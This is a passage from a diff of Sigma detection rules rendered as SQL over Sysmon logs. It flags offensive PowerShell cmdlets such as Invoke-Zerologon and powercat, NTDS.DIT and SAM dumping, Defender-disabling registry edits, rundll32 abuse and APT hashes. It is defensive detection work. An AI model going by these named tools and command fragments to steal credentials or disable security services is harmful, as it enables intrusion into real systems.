LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR 
CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "GALLIUM IOCs", - "id": 
"440a56bf-7873-4439-940a-1c8a671073c2", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', 
'79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", - "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": 
"Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1216" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ + "attack.privilege_escalation", "attack.credential_access", - "attack.t1003.003" + "attack.t1212" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "status": "test", - "description": "Detecting Emotet DLL loading by looking for 
rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe 
with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' 
OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", + "status": "test", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR 
